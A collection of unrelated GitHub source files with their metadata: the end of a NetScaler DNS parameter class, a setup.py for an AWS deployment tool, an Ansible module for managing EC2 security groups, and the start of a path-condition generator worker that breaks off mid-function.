OnlyAAAAQuery = "OnlyAAAAQuery"
AThenAAAAQuery = "AThenAAAAQuery"
AAAAThenAQuery = "AAAAThenAQuery"
class Namelookuppriority:
WINS = "WINS"
DNS = "DNS"
class Dnsrootreferral:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Dnssec:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class dnsparameter_response(base_response) :
def __init__(self, length=1) :
self.dnsparameter = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.dnsparameter = [dnsparameter() for _ in range(length)]
| {
"content_hash": "def92478ddbc24bd6f97ffc1216985a3",
"timestamp": "",
"source": "github",
"line_count": 337,
"max_line_length": 540,
"avg_line_length": 49.07121661721068,
"alnum_prop": 0.7515268791195501,
"repo_name": "benfinke/ns_python",
"id": "1e3fde759248151802227ef0673d2e34fa5c24e5",
"size": "17151",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "nssrc/com/citrix/netscaler/nitro/resource/config/dns/dnsparameter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "21836782"
},
{
"name": "Shell",
"bytes": "513"
}
],
"symlink_target": ""
} |
import sys
from setuptools import setup
from n_utils import PATH_COMMANDS, CONSOLESCRIPTS
setup(name='nitor_deploy_tools',
version='1.60',
description='Tools for deploying to AWS via CloudFormation and Serverless framework that support a pull request based workflow',
url='http://github.com/NitorCreations/nitor-deploy-tools',
download_url='https://github.com/NitorCreations/nitor-deploy-tools/tarball/1.60',
author='Pasi Niemi',
author_email='pasi@nitor.com',
license='Apache 2.0',
packages=['n_utils'],
include_package_data=True,
scripts=PATH_COMMANDS,
entry_points={
'console_scripts': CONSOLESCRIPTS,
},
setup_requires=[
'pytest-runner'
],
install_requires=[
'future',
'pyaml',
'boto3',
'awscli',
'requests',
'termcolor',
'ipaddr',
'argcomplete',
'nitor-vault',
'psutil',
'Pygments',
'pyotp',
'pyqrcode',
'six',
'python-dateutil',
'pycryptodomex',
'configparser',
'scandir'
] + ([
'win-unicode-console',
'wmi',
'pypiwin32'
] if sys.platform.startswith('win') else []),
tests_require=[
'pytest',
'pytest-mock',
'pytest-cov'
],
zip_safe=False)
| {
"content_hash": "563bcc5c5a71f84c3db9914344caed2f",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 134,
"avg_line_length": 28.058823529411764,
"alnum_prop": 0.5359888190076869,
"repo_name": "NitorCreations/nitor-deploy-tools",
"id": "e2883223d46c720e558be5261db3bdbb900f933a",
"size": "2018",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "7703"
},
{
"name": "Groovy",
"bytes": "34278"
},
{
"name": "JavaScript",
"bytes": "2617"
},
{
"name": "PowerShell",
"bytes": "1888"
},
{
"name": "Python",
"bytes": "281286"
},
{
"name": "Shell",
"bytes": "164345"
}
],
"symlink_target": ""
} |
DOCUMENTATION = '''
---
module: ec2_group
author: "Andrew de Quincey (@adq)"
version_added: "1.3"
short_description: maintain an ec2 VPC security group.
description:
- maintains ec2 security groups. This module has a dependency on python-boto >= 2.5
options:
name:
description:
- Name of the security group.
required: true
description:
description:
- Description of the security group.
required: true
vpc_id:
description:
- ID of the VPC to create the group in.
required: false
rules:
description:
- List of firewall inbound rules to enforce in this group (see example). If none are supplied, a default all-out rule is assumed. If an empty list is supplied, no inbound rules will be enabled.
required: false
rules_egress:
description:
- List of firewall outbound rules to enforce in this group (see example). If none are supplied, a default all-out rule is assumed. If an empty list is supplied, no outbound rules will be enabled.
required: false
version_added: "1.6"
state:
version_added: "1.4"
description:
- Create or delete a security group
required: false
default: 'present'
choices: [ "present", "absent" ]
aliases: []
purge_rules:
version_added: "1.8"
description:
- Purge existing rules on security group that are not found in rules
required: false
default: 'true'
aliases: []
purge_rules_egress:
version_added: "1.8"
description:
- Purge existing rules_egress on security group that are not found in rules_egress
required: false
default: 'true'
aliases: []
extends_documentation_fragment:
- aws
- ec2
notes:
- If a rule declares a group_name and that group doesn't exist, it will be
automatically created. In that case, group_desc should be provided as well.
The module will refuse to create a depended-on group without a description.
'''
EXAMPLES = '''
- name: example ec2 group
ec2_group:
name: example
description: an example EC2 group
vpc_id: 12345
region: eu-west-1a
aws_secret_key: SECRET
aws_access_key: ACCESS
rules:
- proto: tcp
from_port: 80
to_port: 80
cidr_ip: 0.0.0.0/0
- proto: tcp
from_port: 22
to_port: 22
cidr_ip: 10.0.0.0/8
- proto: tcp
from_port: 443
to_port: 443
group_id: amazon-elb/sg-87654321/amazon-elb-sg
- proto: tcp
from_port: 3306
to_port: 3306
group_id: 123412341234/sg-87654321/exact-name-of-sg
- proto: udp
from_port: 10050
to_port: 10050
cidr_ip: 10.0.0.0/8
- proto: udp
from_port: 10051
to_port: 10051
group_id: sg-12345678
- proto: icmp
from_port: 8 # icmp type, -1 = any type
to_port: -1 # icmp subtype, -1 = any subtype
cidr_ip: 10.0.0.0/8
- proto: all
# the containing group name may be specified here
group_name: example
rules_egress:
- proto: tcp
from_port: 80
to_port: 80
cidr_ip: 0.0.0.0/0
group_name: example-other
# description to use if example-other needs to be created
group_desc: other example EC2 group
'''
try:
import boto.ec2
from boto.ec2.securitygroup import SecurityGroup
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def make_rule_key(prefix, rule, group_id, cidr_ip):
"""Creates a unique key for an individual group rule"""
if isinstance(rule, dict):
proto, from_port, to_port = [rule.get(x, None) for x in ('proto', 'from_port', 'to_port')]
#fix for 11177
if proto not in ['icmp', 'tcp', 'udp'] and from_port == -1 and to_port == -1:
from_port = 'none'
to_port = 'none'
else: # isinstance boto.ec2.securitygroup.IPPermissions
proto, from_port, to_port = [getattr(rule, x, None) for x in ('ip_protocol', 'from_port', 'to_port')]
key = "%s-%s-%s-%s-%s-%s" % (prefix, proto, from_port, to_port, group_id, cidr_ip)
return key.lower().replace('-none', '-None')
def addRulesToLookup(rules, prefix, dict):
for rule in rules:
for grant in rule.grants:
dict[make_rule_key(prefix, rule, grant.group_id, grant.cidr_ip)] = (rule, grant)
def validate_rule(module, rule):
VALID_PARAMS = ('cidr_ip',
'group_id', 'group_name', 'group_desc',
'proto', 'from_port', 'to_port')
for k in rule:
if k not in VALID_PARAMS:
module.fail_json(msg='Invalid rule parameter \'{}\''.format(k))
if 'group_id' in rule and 'cidr_ip' in rule:
module.fail_json(msg='Specify group_id OR cidr_ip, not both')
elif 'group_name' in rule and 'cidr_ip' in rule:
module.fail_json(msg='Specify group_name OR cidr_ip, not both')
elif 'group_id' in rule and 'group_name' in rule:
module.fail_json(msg='Specify group_id OR group_name, not both')
def get_target_from_rule(module, ec2, rule, name, group, groups, vpc_id):
"""
Returns tuple of (group_id, ip) after validating rule params.
rule: Dict describing a rule.
name: Name of the security group being managed.
groups: Dict of all available security groups.
AWS accepts an ip range or a security group as target of a rule. This
function validate the rule specification and return either a non-None
group_id or a non-None ip range.
"""
FOREIGN_SECURITY_GROUP_REGEX = '^(\S+)/(sg-\S+)/(\S+)'
group_id = None
group_name = None
ip = None
target_group_created = False
if 'group_id' in rule and 'cidr_ip' in rule:
module.fail_json(msg="Specify group_id OR cidr_ip, not both")
elif 'group_name' in rule and 'cidr_ip' in rule:
module.fail_json(msg="Specify group_name OR cidr_ip, not both")
elif 'group_id' in rule and 'group_name' in rule:
module.fail_json(msg="Specify group_id OR group_name, not both")
elif 'group_id' in rule and re.match(FOREIGN_SECURITY_GROUP_REGEX, rule['group_id']):
# this is a foreign Security Group. Since you can't fetch it you must create an instance of it
owner_id, group_id, group_name = re.match(FOREIGN_SECURITY_GROUP_REGEX, rule['group_id']).groups()
group_instance = SecurityGroup(owner_id=owner_id, name=group_name, id=group_id)
groups[group_id] = group_instance
groups[group_name] = group_instance
elif 'group_id' in rule:
group_id = rule['group_id']
elif 'group_name' in rule:
group_name = rule['group_name']
if group_name == name:
group_id = group.id
groups[group_id] = group
groups[group_name] = group
elif group_name in groups:
group_id = groups[group_name].id
else:
if not rule.get('group_desc', '').strip():
module.fail_json(msg="group %s will be automatically created by rule %s and no description was provided" % (group_name, rule))
if not module.check_mode:
auto_group = ec2.create_security_group(group_name, rule['group_desc'], vpc_id=vpc_id)
group_id = auto_group.id
groups[group_id] = auto_group
groups[group_name] = auto_group
target_group_created = True
elif 'cidr_ip' in rule:
ip = rule['cidr_ip']
return group_id, ip, target_group_created
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
name=dict(type='str', required=True),
description=dict(type='str', required=True),
vpc_id=dict(type='str'),
rules=dict(type='list'),
rules_egress=dict(type='list'),
state = dict(default='present', type='str', choices=['present', 'absent']),
purge_rules=dict(default=True, required=False, type='bool'),
purge_rules_egress=dict(default=True, required=False, type='bool'),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
name = module.params['name']
description = module.params['description']
vpc_id = module.params['vpc_id']
rules = module.params['rules']
rules_egress = module.params['rules_egress']
state = module.params.get('state')
purge_rules = module.params['purge_rules']
purge_rules_egress = module.params['purge_rules_egress']
changed = False
ec2 = ec2_connect(module)
# find the group if present
group = None
groups = {}
for curGroup in ec2.get_all_security_groups():
groups[curGroup.id] = curGroup
if curGroup.name in groups:
# Prioritise groups from the current VPC
if vpc_id is None or curGroup.vpc_id == vpc_id:
groups[curGroup.name] = curGroup
else:
groups[curGroup.name] = curGroup
if curGroup.name == name and (vpc_id is None or curGroup.vpc_id == vpc_id):
group = curGroup
# Ensure requested group is absent
if state == 'absent':
if group:
'''found a match, delete it'''
try:
group.delete()
except Exception, e:
module.fail_json(msg="Unable to delete security group '%s' - %s" % (group, e))
else:
group = None
changed = True
else:
'''no match found, no changes required'''
# Ensure requested group is present
elif state == 'present':
if group:
'''existing group found'''
# check the group parameters are correct
group_in_use = False
rs = ec2.get_all_instances()
for r in rs:
for i in r.instances:
group_in_use |= reduce(lambda x, y: x | (y.name == 'public-ssh'), i.groups, False)
if group.description != description:
if group_in_use:
module.fail_json(msg="Group description does not match, but it is in use so cannot be changed.")
# if the group doesn't exist, create it now
else:
'''no match found, create it'''
if not module.check_mode:
group = ec2.create_security_group(name, description, vpc_id=vpc_id)
# When a group is created, an egress_rule ALLOW ALL
# to 0.0.0.0/0 is added automatically but it's not
# reflected in the object returned by the AWS API
# call. We re-read the group for getting an updated object
# amazon sometimes takes a couple seconds to update the security group so wait till it exists
while len(ec2.get_all_security_groups(filters={ 'group_id': group.id, })) == 0:
time.sleep(0.1)
group = ec2.get_all_security_groups(group_ids=(group.id,))[0]
changed = True
else:
module.fail_json(msg="Unsupported state requested: %s" % state)
# create a lookup for all existing rules on the group
if group:
# Manage ingress rules
groupRules = {}
addRulesToLookup(group.rules, 'in', groupRules)
# Now, go through all provided rules and ensure they are there.
if rules is not None:
for rule in rules:
validate_rule(module, rule)
group_id, ip, target_group_created = get_target_from_rule(module, ec2, rule, name, group, groups, vpc_id)
if target_group_created:
changed = True
if rule['proto'] in ('all', '-1', -1):
rule['proto'] = -1
rule['from_port'] = None
rule['to_port'] = None
# Convert ip to list we can iterate over
if not isinstance(ip, list):
ip = [ip]
# If rule already exists, don't later delete it
for thisip in ip:
ruleId = make_rule_key('in', rule, group_id, thisip)
if ruleId in groupRules:
del groupRules[ruleId]
# Otherwise, add new rule
else:
grantGroup = None
if group_id:
grantGroup = groups[group_id]
if not module.check_mode:
group.authorize(rule['proto'], rule['from_port'], rule['to_port'], thisip, grantGroup)
changed = True
# Finally, remove anything left in the groupRules -- these will be defunct rules
if purge_rules:
for (rule, grant) in groupRules.itervalues() :
grantGroup = None
if grant.group_id:
if grant.owner_id != group.owner_id:
# this is a foreign Security Group. Since you can't fetch it you must create an instance of it
group_instance = SecurityGroup(owner_id=grant.owner_id, name=grant.name, id=grant.group_id)
groups[grant.group_id] = group_instance
groups[grant.name] = group_instance
grantGroup = groups[grant.group_id]
if not module.check_mode:
group.revoke(rule.ip_protocol, rule.from_port, rule.to_port, grant.cidr_ip, grantGroup)
changed = True
# Manage egress rules
groupRules = {}
addRulesToLookup(group.rules_egress, 'out', groupRules)
# Now, go through all provided rules and ensure they are there.
if rules_egress is not None:
for rule in rules_egress:
validate_rule(module, rule)
group_id, ip, target_group_created = get_target_from_rule(module, ec2, rule, name, group, groups, vpc_id)
if target_group_created:
changed = True
if rule['proto'] in ('all', '-1', -1):
rule['proto'] = -1
rule['from_port'] = None
rule['to_port'] = None
# Convert ip to list we can iterate over
if not isinstance(ip, list):
ip = [ip]
# If rule already exists, don't later delete it
for thisip in ip:
ruleId = make_rule_key('out', rule, group_id, thisip)
if ruleId in groupRules:
del groupRules[ruleId]
# Otherwise, add new rule
else:
grantGroup = None
if group_id:
grantGroup = groups[group_id].id
if not module.check_mode:
ec2.authorize_security_group_egress(
group_id=group.id,
ip_protocol=rule['proto'],
from_port=rule['from_port'],
to_port=rule['to_port'],
src_group_id=grantGroup,
cidr_ip=thisip)
changed = True
elif vpc_id and not module.check_mode:
# when using a vpc, but no egress rules are specified,
# we add in a default allow all out rule, which was the
# default behavior before egress rules were added
default_egress_rule = 'out--1-None-None-None-0.0.0.0/0'
if default_egress_rule not in groupRules:
ec2.authorize_security_group_egress(
group_id=group.id,
ip_protocol=-1,
from_port=None,
to_port=None,
src_group_id=None,
cidr_ip='0.0.0.0/0'
)
changed = True
else:
# make sure the default egress rule is not removed
del groupRules[default_egress_rule]
# Finally, remove anything left in the groupRules -- these will be defunct rules
if purge_rules_egress:
for (rule, grant) in groupRules.itervalues():
grantGroup = None
if grant.group_id:
grantGroup = groups[grant.group_id].id
if not module.check_mode:
ec2.revoke_security_group_egress(
group_id=group.id,
ip_protocol=rule.ip_protocol,
from_port=rule.from_port,
to_port=rule.to_port,
src_group_id=grantGroup,
cidr_ip=grant.cidr_ip)
changed = True
if group:
module.exit_json(changed=changed, group_id=group.id)
else:
module.exit_json(changed=changed, group_id=None)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
main()
| {
"content_hash": "e8689c1a0c6e99563c86b8c9d779002a",
"timestamp": "",
"source": "github",
"line_count": 455,
"max_line_length": 201,
"avg_line_length": 37.96923076923077,
"alnum_prop": 0.557247047927761,
"repo_name": "daniel-rhoades/hippo-production-example",
"id": "6a696eacc6c93d9709aacb78a439e89ddff00a46",
"size": "17971",
"binary": false,
"copies": "19",
"ref": "refs/heads/master",
"path": "library/ec2_group.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "43639"
},
{
"name": "Shell",
"bytes": "1774"
}
],
"symlink_target": ""
} |
from t_core.messages import Packet
from t_core.iterator import Iterator
import time
from multiprocessing import Process
from core.himesis_utils import expand_graph, shrink_graph, delete_graph, disjoint_model_union, print_graph, graph_to_dot, get_preds_and_succs
from copy import deepcopy
import numpy.random as nprnd
from profiler import *
from util.progress import ProgressBar
from PCDict import PCDict
#needed to use kernprof
class DummyProcess:
def join(self):
pass
def start(self):
self.run()
class path_condition_generator_worker(Process):
def __init__(self, layer_rules, rulesToTreat, rulesForSecondPhase, pruner, layer, num, report_progress, verbosity):
super(path_condition_generator_worker, self).__init__()
self.layer_rules = layer_rules
self.rulesToTreat = rulesToTreat
self.rulesForSecondPhase = rulesForSecondPhase
self.layer = layer
self.num = num
self.currentPathConditionSet = None
self.worker_list = None
self.verbosity = verbosity
self.rule_names = None
self.ruleCombinators = None
self.ruleTraceCheckers = None
self.overlappingRules = None
self.subsumption = None
self.loopingRuleSubsumption = None
nprnd.seed(num)
self.report_progress = report_progress
self.pruner = pruner
self.pc_dict = None
def load_pc_dict(self, pcs):
#print("PC length: " + str(len(pcs)))
self.pc_dict = PCDict(pcs)
def getRuleNamesInPathCondition(self, pcName):
ruleNames = []
for token in pcName.split("_"):
if token == 'E':
pass
else:
rulename = token.split("-")[0]
ruleNames.append(rulename)
return ruleNames
#@do_cprofile
#@profile
def run(self):
#start_time = time.time()
#print("Running thread")
pathConSetLength = len(self.currentPathConditionSet)
newPathConditionSet = []
new_pc_dict = {}
name_dict = {}
reverse_name_dict = {}
progress_bar = None
if self.report_progress:
progress_bar = ProgressBar(pathConSetLength)
pcs_to_prune = []
pcs_to_prune_less = []
for pathConditionIndex in range(pathConSetLength):
pc_name = self.currentPathConditionSet[pathConditionIndex]
if self.report_progress:
progress_bar.update_progress(pathConditionIndex)
pc = self.pc_dict[pc_name]
#store the preds and succs of the pc graph if needed
pc_preds = []
pc_succs = []
childrenPathConditions = [pc_name]
# produce a fresh copy of the path condition in pc_dict, associated with the name of the path condition.
# this frees up the original parent path condition that will not be changed throughout the execution of
# the rules in the layer, while its copy will. This will avoid matching over a rewritten parent path condition.
#self.pc_dict[pc_name] = shrink_graph(deepcopy(pc))
###########################################################################
# Run first phase: run all rules without any overlaps with subsuming rules
###########################################################################
for rule in self.layer_rules:
rule_name = rule.name
if self.verbosity >= 2:
print("--------------------------------------")
print("Treating rule: " + self.rule_names[rule_name])
print("Combining with:")
print("Path Condition:" + pc_name)
#if self.verbosity >= 1:
#print "Layer: " + str(self.layer+1)
#print "Number of Path Conditions generated so far: " + str(len(self.currentPathConditionSet))
#print "Number of Path Conditions Percentage: " + str(int(pathConditionIndex / float(pathConSetLength) * 100))
# calculate if the rule is in a subsuming loop and has a subsuming parent
ruleInLoopAndHasSubsumingParent = False
for loop in self.loopingRuleSubsumption:
if rule_name in loop and loop[0] != rule_name:
ruleInLoopAndHasSubsumingParent = True
# can symbolically execute only if the path condition contains no rule that subsumes
# the rule being executed or rule subsumed by the rule being executed.
# in this way we guarantee that all rules in a partial order get executed
# at least once (when the larger rules don't execute), and overlaps are
# dealt with during the second phase - i.e. all rules that execute and subsume
# others have to get their subsumed rules executed too.
if ruleInLoopAndHasSubsumingParent:
if self.verbosity:
print("Rule is in loop and has subsuming parent, skipping")
continue
subsumingRules = []
if rule_name in self.overlappingRules.keys():
subsumingRules = self.overlappingRules[rule_name]
subsumedRules = []
if rule_name in self.subsumption.keys():
subsumedRules = self.subsumption[rule_name]
# possible cases of rule combination
######################################
# Case 1: Rule has no dependencies
######################################
# the rule is disjointly added to the path condition
if len(self.ruleCombinators[rule_name]) == 1:
if self.verbosity >= 2 : print("Case 1: Rule has no dependencies")
# The rule only gets ran in the first phase if it does not overlap with any other rule.
# check if any of the subsuming rules exists in the path condition
localPathConditionLayerAccumulator = []
for child_pc_index in range(len(childrenPathConditions)):
child_pc_name = childrenPathConditions[child_pc_index]
has_subsuming = any(sRule in child_pc_name for sRule in subsumingRules)
if has_subsuming:
if self.verbosity >= 2:
print("Skipping child: " + child_pc_name + " due to presence of subsuming rule")
continue
has_subsumed = any(sRule in child_pc_name for sRule in subsumedRules)
if has_subsumed:
if self.verbosity >= 2:
print("Skipping child: " + child_pc_name + " due to presence of subsumed rule")
continue
# if not (rule_name in self.overlappingRules.keys() or\
# (rule_name in self.overlappingRules.keys() and subsumedRulesinPC)):
cpc = self.pc_dict[child_pc_name]
#take off the num of nodes in the name
cpc_name = cpc.name.split(".")[0]
new_name = cpc_name + '_' + rule_name + "-"
# create a new path condition which is the result of combining the rule with the current path condition being examined
newPathCond = cpc.copy()
newPathCond = disjoint_model_union(newPathCond,rule)
new_name += "." + str(newPathCond.vcount())
# name the new path condition as the combination of the previous path condition and the rule
newPathCond.name = new_name
if self.pruner.isPathConditionStillFeasible(newPathCond, self.rulesToTreat):
shrunk_newCond = shrink_graph(newPathCond)
self.pc_dict[new_name] = shrunk_newCond
new_pc_dict[new_name] = shrunk_newCond
if self.verbosity >= 2 : print("Created path condition with name: " + newPathCond.name)
localPathConditionLayerAccumulator.append(new_name)
#print_graph(newPathCond)
# store the newly created path condition as a child
childrenPathConditions.append(new_name)
newPathConditionSet.extend(localPathConditionLayerAccumulator)
else:
#########################################################################
# Case 2: Rule has dependencies but cannot execute because
# not all the backward links can be found in the path condition
#########################################################################
# gather the matcher for only the backward links in the rule being combined.
# it is the first matcher (LHS) of the combinators in the list.
ruleBackwardLinksMatcher = self.ruleTraceCheckers[rule_name]
# check if the backward links cannot be found by matching them on the path condition
# if not pc_preds or not pc_succs:
# pc_preds, pc_succs = get_preds_and_succs(pc)
#pc_preds = [(len(tmp), tmp) for tmp in pc.get_adjlist(mode=2)]
#pc_succs = [(len(tmp), tmp) for tmp in pc.get_adjlist(mode=1)]
p = Packet()
p.graph = pc
ruleBackwardLinksMatcher.packet_in(p, preds=pc_preds, succs=pc_succs)
if not ruleBackwardLinksMatcher.is_success:
if self.verbosity >= 2 : print("Case 2: Rule has dependencies but cannot execute")
else:
#graph_to_dot(pc.name + "_par", pc)
#########################################################################
# Case 3: Rule has dependencies that may or will execute
#########################################################################
if self.verbosity >= 2 : print("Case 3: Rule has dependencies that may or will execute")
# go through the partial and the total rule combinators
for combinator in range(2):
combinatorMatcher = self.ruleCombinators[rule_name][combinator][0]
if self.verbosity >= 2 : print("Combinator: " + combinatorMatcher.condition.name)
# check whether we are dealing with a partial or a total combinator
isTotalCombinator = False
#if combinator == len(self.ruleCombinators[rule_name]) - 1:
if combinator == 1:
isTotalCombinator = True
# find all the matches of the rule combinator in the path condition that the rule combines with
p = Packet()
p.graph = pc
#print_graph(p.graph)
combinatorMatcher.packet_in(p, preds=pc_preds, succs=pc_succs)
# if self.rule_names[rule.name] == "HereferenceOUTeTypeSolveRefEReferenceEClassifierEReferenceEClassifier":
# graph_to_dot("pathCondition_par_" + pc.name, pc)
#graph_to_dot("combinator_par_" + combinatorMatcher.condition.name, combinatorMatcher.condition)
#print_graph(combinatorMatcher.condition)
#print_graph(pc)
# now go through the path conditions resulting from combination of the rule and the
# path condition from the previous layer currently being treated in order to apply
# the combinator's RHS to every possibility of match of the combinator's LHS
if self.verbosity >= 2 :
if combinatorMatcher.is_success:
print("Matching was successful")
else:
print("Matching was not successful")
if combinatorMatcher.is_success:
# holds the result of combining the path conditions generated so far when combining
# the rule with the path condition using the multiple combinators
partialTotalPathCondLayerAccumulator = []
# now combine the rule with the newly created path condition using the current combinator
# in all the places where the rule matched on top of the path condition
i = Iterator()
#p_copy = deepcopy(p)
#p_copy = i.packet_in(p_copy)
p = i.packet_in(p)
#
# pathCondSubnum = 0
#
# while i.is_success and pathCondSubnum < 1:
#go through all the children of this path condition
for child_pc_index in range(len(childrenPathConditions)):
#get the name of the child
child_pc_name = childrenPathConditions[child_pc_index]
has_subsuming = any(sRule in child_pc_name for sRule in subsumingRules)
if has_subsuming:
if self.verbosity >= 2:
print("Skipping child: " + child_pc_name + " due to presence of subsuming rule")
continue
has_subsumed = any(sRule in child_pc_name for sRule in subsumedRules)
if has_subsumed:
if self.verbosity >= 2:
print("Skipping child: " + child_pc_name + " due to presence of subsumed rule")
continue
if self.verbosity >= 2 :
print("--> Combining with path condition: " + child_pc_name)
# # only combine if the rule hasn't executed yet on that path condition
#
# # get all the rule names in the name of the rule being executed (can be merged with subsumed rules).
# # also get the rule names of all rules already present in the path condition
# ruleNamesInRule = rule.name.split("_")
# ruleNamesInPC = child_pc_name.split("_")
# # cleanup the dashes from the rule names in the path condition
# for nameIndex in range(len(ruleNamesInPC)):
# ruleNamesInPC[nameIndex] = ruleNamesInPC[nameIndex].split("-")[0]
#get the path condition from the dictionary
cpc = self.pc_dict[child_pc_name]
# if the combinator is not the total one, make a copy of the path condition in the set
# of combinations generated so far.
# the total combinator is always the one at the end of the combinator list for the rule.
# name the new path condition as the combination of the previous path condition and the rule
newPathCondName = cpc.name.split(".")[0] + "_" + rule.name
p_copy = deepcopy(p)
newPathCond = cpc.copy()
p_copy.graph = newPathCond
rewriter = self.ruleCombinators[rule.name][combinator][1]
p_copy = rewriter.packet_in(p_copy)
newPathCond = p_copy.graph
# check if the equations on the attributes of the newly created path condition are satisfied
#if not is_consistent(newPathCond):
if not rewriter.is_success:
if self.verbosity >= 2:
print("Path Condition: " + newPathCondName + " has inconsistent equations")
# elif not self.pruner.isPathConditionStillFeasible(newPathCond,
# rulesToTreat):
# if self.verbosity >= 2:
# print("Path Condition: " + newPathCondName + " was pruned")
else:
valid = True
if isTotalCombinator:
#print("Going to write a total: " + newPathCondName)
newPathCondName = newPathCondName +"-T"# + str(pathCondSubnum)
newPathCondName += "." + str(len(newPathCond.vs))
newPathCond.name = newPathCondName
if not self.pruner.isPathConditionStillFeasible(
newPathCond, self.rulesToTreat):
valid = False
if self.verbosity >= 2:
print("Total: Possible PC: " + newPathCondName + " valid?: " + str(valid))
# because the rule combines totally with a path condition in the accumulator we just copy it
# directly on top of the accumulated path condition
# several totals my exist, so the original PC may be rewritten multiple times
# previousTotalPC = None
# writeOverPreviousTotalPC = False
if valid:
try:
reverse_name = reverse_name_dict[cpc.name]
name_dict[reverse_name] = newPathCondName
reverse_name_dict[newPathCondName] = reverse_name
except KeyError:
name_dict[cpc.name] = newPathCondName
reverse_name_dict[newPathCondName] = cpc.name
#prune the old path condition
pcs_to_prune.append(childrenPathConditions[child_pc_index])
pcs_to_prune_less.append(childrenPathConditions[child_pc_index])
#change the child's name in the child's array
childrenPathConditions[child_pc_index] = newPathCondName
else:
#print("Going to write a partial: " + newPathCondName)
newPathCondName = newPathCondName +"-P"# + str(pathCondSubnum)
newPathCondName += "." + str(len(newPathCond.vs))
newPathCond.name = newPathCondName
# we are dealing with a partial combination of the rule.
# create a copy of the path condition in the accumulator because this match of the rule is partial.
if not self.pruner.isPathConditionStillFeasible(
newPathCond, self.rulesToTreat):
valid = False
else:
# add the result to the local accumulator
partialTotalPathCondLayerAccumulator.append(newPathCond.name)
if self.verbosity >= 2:
print("Partial: Possible PC: " + newPathCondName + " valid?: " + str(valid))
# store the parent of the newly created path condition
childrenPathConditions.append(newPathCond.name)
if self.verbosity >= 2:
print("Created path condition with name: " + newPathCondName)
# store the new path condition
shrunk_newCond = shrink_graph(newPathCond)
self.pc_dict[newPathCondName] = shrunk_newCond
if valid:
new_pc_dict[newPathCondName] = shrunk_newCond
else:
pcs_to_prune.append(newPathCondName)
#p = i.next_in(p)
#pathCondSubnum += 1
newPathConditionSet.extend(partialTotalPathCondLayerAccumulator)
###########################################################################
# Run second phase: run all rules with any overlaps with subsuming rules on
# path conditions generated during the first phase
###########################################################################
# print("--------------------------------")
# print("overlapping rules: " + str(self.overlappingRules.keys()))
# print("rules in layer: " + str(ruleNamesInLayer))
# print("Rules for second phase: " + str(rulesForSecondPhase))
for pathConditionIndex2 in range(len(childrenPathConditions)):
for rule_name in self.rulesForSecondPhase:
ruleNamesInPC = []
for token in childrenPathConditions[pathConditionIndex2].split("_"):
ruleNamesInPC.append(token.split("-")[0])
# print("Rule names in PC: " + str(ruleNamesInPC))
# print("Overlaps looked for: " + str(self.overlappingRules[rule_name]))
# print("Intersection: " + str(set(self.overlappingRules[rule_name]).intersection(set(ruleNamesInPC))))
# check if any of the subsuming rules exists in the path condition's name,
# otherwise don't even try to apply the rule.
# check also if the rules has not been previously executed as a rule with no dependencies
if set(self.overlappingRules[rule_name]).intersection(set(ruleNamesInPC)) != set() and\
rule_name not in childrenPathConditions[pathConditionIndex2]:
if self.verbosity >= 2 : print("Executing rule " + self.rule_names[rule_name] + " in second phase for overlaps.")
#combinatorMatcher = None
#combinatorRewriter = None
if len(self.ruleCombinators[rule_name]) == 1:
# Case 1: Rule has no dependencies
combinatorMatcher = self.ruleCombinators[rule_name][0][0]
combinatorRewriter = self.ruleCombinators[rule_name][0][1]
else:
# Case 3: Rule has dependencies that may or will execute
combinatorMatcher = self.ruleCombinators[rule_name][2][0]
combinatorRewriter = self.ruleCombinators[rule_name][2][1]
# execute the rule
p = Packet()
cpc = self.pc_dict[childrenPathConditions[pathConditionIndex2]]
p.graph = cpc
p = combinatorMatcher.packet_in(p)
# print "----> PC Name: " + childrenPathConditions[pathConditionIndex]
#print ("-----------------------------> Match: " + str(combinatorMatcher.is_success))
i = Iterator()
p = i.packet_in(p)
# print "Match site:"
# for matchSite in p.match_sets.keys():
# print str(p.match_sets[matchSite])
numOfOverlaps = 0
while i.is_success:
numOfOverlaps = numOfOverlaps + 1
beforeOverlappingPC = p.graph.copy()
p = combinatorRewriter.packet_in(p)
if not combinatorRewriter.is_success:
if self.verbosity >= 2:
print("Graph: " + p.graph.name + " has inconsistent equations")
p.graph = beforeOverlappingPC
#print("--------------------------------> Rewrite: " + str(combinatorRewriter.is_success))
p = i.next_in(p)
newPathCond = p.graph
newPathCondName = cpc.name.split(".")[0] + "_" + rule_name + "-OVER" + str(numOfOverlaps)
newPathCondName += "." + str(len(newPathCond.vs))
# replace the original path condition by the result of overlapping the subsumed rule on it
# previousTotalPC = None
# writeOverPreviousTotalPC = False
try:
reverse_name = reverse_name_dict[cpc.name]
if reverse_name in name_dict:
pcs_to_prune.append(name_dict[reverse_name])
name_dict[reverse_name] = newPathCondName
reverse_name_dict[newPathCondName] = reverse_name
except KeyError:
name_dict[cpc.name] = newPathCondName
reverse_name_dict[newPathCondName] = cpc.name
# for nameTotalPC in name_dict.keys():
# if name_dict[nameTotalPC] == cpc.name:
# previousTotalPC = nameTotalPC
# writeOverPreviousTotalPC = True
# break
#
# if not writeOverPreviousTotalPC:
# name_dict[cpc.name] = newPathCondName
# reverse_name_dict[newPathCondName] = cpc.name
# else:
# name_dict[previousTotalPC] = newPathCondName
# reverse_name_dict[newPathCondName] = previousTotalPC
childrenPathConditions[pathConditionIndex2] = newPathCondName
if self.verbosity >= 2:
print("Second Phase: Created new path condition: " + newPathCondName)
newPathCond.name = newPathCondName
shrunk_pc = shrink_graph(newPathCond)
self.pc_dict[newPathCondName] = shrunk_pc
new_pc_dict[newPathCondName] = shrunk_pc
